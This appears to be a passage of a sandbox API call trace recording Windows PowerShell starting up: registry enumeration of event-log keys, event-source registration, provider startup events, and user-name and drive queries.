	[0040.803] RegQueryInfoKeyW (in: hKey=0x390, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x25e438, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x25e434, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x25e438*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x25e434*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0040.803] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x0, lpName=0x190b58, lpcchName=0x25e454, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x25e454, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0040.804] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x1, lpName=0x190b58, lpcchName=0x25e454, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x25e454, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0040.804] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x2, lpName=0x190b58, lpcchName=0x25e454, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x25e454, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0040.804] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x3, lpName=0x190b58, lpcchName=0x25e454, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x25e454, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0040.804] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x4, lpName=0x190b58, lpcchName=0x25e454, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x25e454, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0040.804] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x5, lpName=0x190b58, lpcchName=0x25e454, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x25e454, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0040.804] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x6, lpName=0x190b58, lpcchName=0x25e454, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x25e454, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0040.804] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x7, lpName=0x190b58, lpcchName=0x25e454, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x25e454, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0040.804] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x8, lpName=0x190b58, lpcchName=0x25e454, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x25e454, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0040.805] RegOpenKeyExW (in: hKey=0x390, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e400 | out: phkResult=0x25e400*=0x374) returned 0x0
	[0040.805] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e400 | out: phkResult=0x25e400*=0x0) returned 0x2
	[0040.805] RegOpenKeyExW (in: hKey=0x390, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e400 | out: phkResult=0x25e400*=0x394) returned 0x0
	[0040.805] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e400 | out: phkResult=0x25e400*=0x0) returned 0x2
	[0040.805] RegOpenKeyExW (in: hKey=0x390, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e400 | out: phkResult=0x25e400*=0x398) returned 0x0
	[0040.805] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e400 | out: phkResult=0x25e400*=0x0) returned 0x2
	[0040.805] RegOpenKeyExW (in: hKey=0x390, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e400 | out: phkResult=0x25e400*=0x39c) returned 0x0
	[0040.806] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e400 | out: phkResult=0x25e400*=0x0) returned 0x2
	[0040.806] RegOpenKeyExW (in: hKey=0x390, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e400 | out: phkResult=0x25e400*=0x3a0) returned 0x0
	[0040.806] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e400 | out: phkResult=0x25e400*=0x0) returned 0x2
	[0040.806] RegOpenKeyExW (in: hKey=0x390, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e400 | out: phkResult=0x25e400*=0x3a4) returned 0x0
	[0040.806] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e400 | out: phkResult=0x25e400*=0x0) returned 0x2
	[0040.806] RegOpenKeyExW (in: hKey=0x390, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e400 | out: phkResult=0x25e400*=0x0) returned 0x5
	[0040.808] RegOpenKeyExW (in: hKey=0x390, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e400 | out: phkResult=0x25e400*=0x3a8) returned 0x0
	[0040.808] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e400 | out: phkResult=0x25e400*=0x0) returned 0x2
	[0040.808] RegOpenKeyExW (in: hKey=0x390, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e400 | out: phkResult=0x25e400*=0x3ac) returned 0x0
	[0040.808] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e400 | out: phkResult=0x25e400*=0x3b0) returned 0x0
	[0040.808] RegCloseKey (hKey=0x3b0) returned 0x0
	[0040.809] RegCloseKey (hKey=0x390) returned 0x0
	[0040.809] RegCloseKey (hKey=0x3ac) returned 0x0
	[0040.811] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x4350004
	[0040.815] GetLastError () returned 0x0
	[0040.817] ReportEventW (hEventLog=0x4350004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2a580d8*="WSMan", lpRawData=0x2a57f80) returned 1
	[0040.821] GetLastError () returned 0x0
	[0040.822] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190b58, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0040.822] GetLastError () returned 0xcb
	[0040.823] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25df74, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.823] GetLastError () returned 0xcb
	[0040.823] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25df24, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.823] GetLastError () returned 0xcb
	[0040.823] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25df24, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.823] GetLastError () returned 0xcb
	[0040.823] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x191318, nSize=0x25e574 | out: lpNameBuffer="ZGW5TDPU\\2XC7u663GxWc", nSize=0x25e574) returned 0x1
	[0040.824] GetLastError () returned 0xcb
	[0040.824] GetUserNameW (in: lpBuffer=0x190b58, pcbBuffer=0x25e57c | out: lpBuffer="2XC7u663GxWc", pcbBuffer=0x25e57c) returned 1
	[0040.824] ReportEventW (hEventLog=0x4350004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2a5bf7c*="Alias", lpRawData=0x2a5be38) returned 1
	[0040.824] GetLastError () returned 0x0
	[0040.825] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190b58, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0040.825] GetLastError () returned 0xcb
	[0040.826] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25df74, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.826] GetLastError () returned 0xcb
	[0040.827] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25df24, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.827] GetLastError () returned 0xcb
	[0040.827] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25df24, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.827] GetLastError () returned 0xcb
	[0040.827] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x191318, nSize=0x25e574 | out: lpNameBuffer="ZGW5TDPU\\2XC7u663GxWc", nSize=0x25e574) returned 0x1
	[0040.827] GetLastError () returned 0xcb
	[0040.827] GetUserNameW (in: lpBuffer=0x190b58, pcbBuffer=0x25e57c | out: lpBuffer="2XC7u663GxWc", pcbBuffer=0x25e57c) returned 1
	[0040.828] ReportEventW (hEventLog=0x4350004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2a5fed8*="Environment", lpRawData=0x2a5fd94) returned 1
	[0040.828] GetLastError () returned 0x0
	[0040.829] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190b58, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0040.829] GetLastError () returned 0xcb
	[0040.830] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x190b58, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0040.830] GetLastError () returned 0xcb
	[0040.830] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x190b58, nSize=0x80 | out: lpBuffer="\\Users\\2XC7u663GxWc") returned 0x13
	[0040.830] GetLastError () returned 0xcb
	[0040.831] GetFullPathNameW (in: lpFileName="C:\\Users\\2XC7u663GxWc", nBufferLength=0x105, lpBuffer=0x25e0a4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc", lpFilePart=0x0) returned 0x15
	[0040.831] GetLastError () returned 0xcb
	[0040.831] SetErrorMode (uMode=0x1) returned 0x1
	[0040.831] GetFileAttributesExW (in: lpFileName="C:\\Users\\2XC7u663GxWc" (normalized: "c:\\users\\2xc7u663gxwc"), fInfoLevelId=0x0, lpFileInformation=0x25e524 | out: lpFileInformation=0x25e524*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc16c9120, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xc1c966c0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0xc1c966c0, ftLastWriteTime.dwHighDateTime=0x1d348d5, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0040.831] GetLastError () returned 0xcb
	[0040.831] SetErrorMode (uMode=0x1) returned 0x1
	[0040.831] GetLogicalDrives () returned 0x4
	[0040.831] GetLastError () returned 0xcb
	[0040.832] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x25dfc8, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0040.832] GetLastError () returned 0xcb
	[0040.833] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0040.833] GetLastError () returned 0xcb
	[0040.833] SetErrorMode (uMode=0x1) returned 0x1
	[0040.835] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x190c58, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x25e4f0, lpMaximumComponentLength=0x25e4ec, lpFileSystemFlags=0x25e4e8, lpFileSystemNameBuffer=0x190b58, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x25e4f0*=0x64285303, lpMaximumComponentLength=0x25e4ec*=0xff, lpFileSystemFlags=0x25e4e8*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0040.836] GetLastError () returned 0xcb
	[0040.836] SetErrorMode (uMode=0x1) returned 0x1
	[0040.836] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0040.836] GetLastError () returned 0xcb
	[0040.836] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x25e050, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0040.836] GetLastError () returned 0xcb
	[0040.836] SetErrorMode (uMode=0x1) returned 0x1
	[0040.836] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x2a610e0 | out: lpFileInformation=0x2a610e0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xe662e5bd, ftCreationTime.dwHighDateTime=0x1ca0427, ftLastAccessTime.dwLowDateTime=0x630b8bd0, ftLastAccessTime.dwHighDateTime=0x1d46cf7, ftLastWriteTime.dwLowDateTime=0x630b8bd0, ftLastWriteTime.dwHighDateTime=0x1d46cf7, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0040.836] GetLastError () returned 0xcb
	[0040.836] SetErrorMode (uMode=0x1) returned 0x1
	[0040.837] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x25e050, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0040.837] GetLastError () returned 0xcb
	[0040.837] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x25dfdc, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0040.837] GetLastError () returned 0xcb
	[0040.837] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0040.837] GetLastError () returned 0xcb
	[0040.839] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x25df98, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0040.839] GetLastError () returned 0xcb
	[0040.839] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0040.839] GetLastError () returned 0xcb
	[0040.839] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x25dfa0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0040.839] GetLastError () returned 0xcb
	[0040.839] SetErrorMode (uMode=0x1) returned 0x1
	[0040.839] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x2a61d38 | out: lpFileInformation=0x2a61d38*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xe662e5bd, ftCreationTime.dwHighDateTime=0x1ca0427, ftLastAccessTime.dwLowDateTime=0x630b8bd0, ftLastAccessTime.dwHighDateTime=0x1d46cf7, ftLastWriteTime.dwLowDateTime=0x630b8bd0, ftLastWriteTime.dwHighDateTime=0x1d46cf7, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0040.840] GetLastError () returned 0xcb
	[0040.840] SetErrorMode (uMode=0x1) returned 0x1
	[0040.840] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x25dfa8, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0040.840] GetLastError () returned 0xcb
	[0040.840] SetErrorMode (uMode=0x1) returned 0x1
	[0040.840] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x2a61e88 | out: lpFileInformation=0x2a61e88*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xe662e5bd, ftCreationTime.dwHighDateTime=0x1ca0427, ftLastAccessTime.dwLowDateTime=0x630b8bd0, ftLastAccessTime.dwHighDateTime=0x1d46cf7, ftLastWriteTime.dwLowDateTime=0x630b8bd0, ftLastWriteTime.dwHighDateTime=0x1d46cf7, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0040.840] GetLastError () returned 0xcb
	[0040.840] SetErrorMode (uMode=0x1) returned 0x1
	[0040.840] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x25dfec, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0040.840] GetLastError () returned 0xcb
	[0040.840] SetErrorMode (uMode=0x1) returned 0x1
	[0040.840] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x2a62028 | out: lpFileInformation=0x2a62028*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xe662e5bd, ftCreationTime.dwHighDateTime=0x1ca0427, ftLastAccessTime.dwLowDateTime=0x630b8bd0, ftLastAccessTime.dwHighDateTime=0x1d46cf7, ftLastWriteTime.dwLowDateTime=0x630b8bd0, ftLastWriteTime.dwHighDateTime=0x1d46cf7, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0040.840] GetLastError () returned 0xcb
	[0040.840] SetErrorMode (uMode=0x1) returned 0x1
	[0040.841] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x191318, nSize=0x25e574 | out: lpNameBuffer="ZGW5TDPU\\2XC7u663GxWc", nSize=0x25e574) returned 0x1
	[0040.841] GetLastError () returned 0xcb
	[0040.841] GetUserNameW (in: lpBuffer=0x190b58, pcbBuffer=0x25e57c | out: lpBuffer="2XC7u663GxWc", pcbBuffer=0x25e57c) returned 1
	[0040.841] ReportEventW (hEventLog=0x4350004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2a64d78*="FileSystem", lpRawData=0x2a64c34) returned 1
	[0040.842] GetLastError () returned 0x0
	[0040.842] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190b58, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0040.843] GetLastError () returned 0xcb
	[0040.843] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25df90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.843] GetLastError () returned 0xcb
	[0040.843] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25df40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.843] GetLastError () returned 0xcb
	[0040.843] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25df40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.843] GetLastError () returned 0xcb
	[0040.844] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x191318, nSize=0x25e574 | out: lpNameBuffer="ZGW5TDPU\\2XC7u663GxWc", nSize=0x25e574) returned 0x1
	[0040.844] GetLastError () returned 0xcb
	[0040.844] GetUserNameW (in: lpBuffer=0x190b58, pcbBuffer=0x25e57c | out: lpBuffer="2XC7u663GxWc", pcbBuffer=0x25e57c) returned 1
	[0040.844] ReportEventW (hEventLog=0x4350004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2a68e30*="Function", lpRawData=0x2a68cec) returned 1
	[0040.845] GetLastError () returned 0x0
	[0040.847] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190b58, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0040.847] GetLastError () returned 0xcb
	[0040.852] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25df88, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.852] GetLastError () returned 0xcb
	[0040.852] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25df38, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.852] GetLastError () returned 0xcb
	[0040.852] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25df38, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.852] GetLastError () returned 0xcb
	[0040.852] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25df38, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.852] GetLastError () returned 0xcb
	[0040.897] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25df88, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.897] GetLastError () returned 0xcb
	[0040.897] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25df38, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.897] GetLastError () returned 0xcb
	[0040.897] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25df38, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.897] GetLastError () returned 0xcb
	[0040.899] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x191318, nSize=0x25e574 | out: lpNameBuffer="ZGW5TDPU\\2XC7u663GxWc", nSize=0x25e574) returned 0x1
	[0040.899] GetLastError () returned 0xcb
	[0040.899] GetUserNameW (in: lpBuffer=0x190b58, pcbBuffer=0x25e57c | out: lpBuffer="2XC7u663GxWc", pcbBuffer=0x25e57c) returned 1
	[0040.900] ReportEventW (hEventLog=0x4350004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2a81eac*="Registry", lpRawData=0x2a81d68) returned 1
	[0040.900] GetLastError () returned 0x0
	[0040.901] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25df74, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.901] GetLastError () returned 0x0
	[0040.901] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25df24, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.901] GetLastError () returned 0x0
	[0040.901] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25df24, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.901] GetLastError () returned 0x0
	[0040.902] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x191318, nSize=0x25e574 | out: lpNameBuffer="ZGW5TDPU\\2XC7u663GxWc", nSize=0x25e574) returned 0x1
	[0040.902] GetLastError () returned 0x0
	[0040.902] GetUserNameW (in: lpBuffer=0x190b58, pcbBuffer=0x25e57c | out: lpBuffer="2XC7u663GxWc", pcbBuffer=0x25e57c) returned 1
	[0040.902] ReportEventW (hEventLog=0x4350004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2a85c5c*="Variable", lpRawData=0x2a85b18) returned 1
	[0040.903] GetLastError () returned 0x0
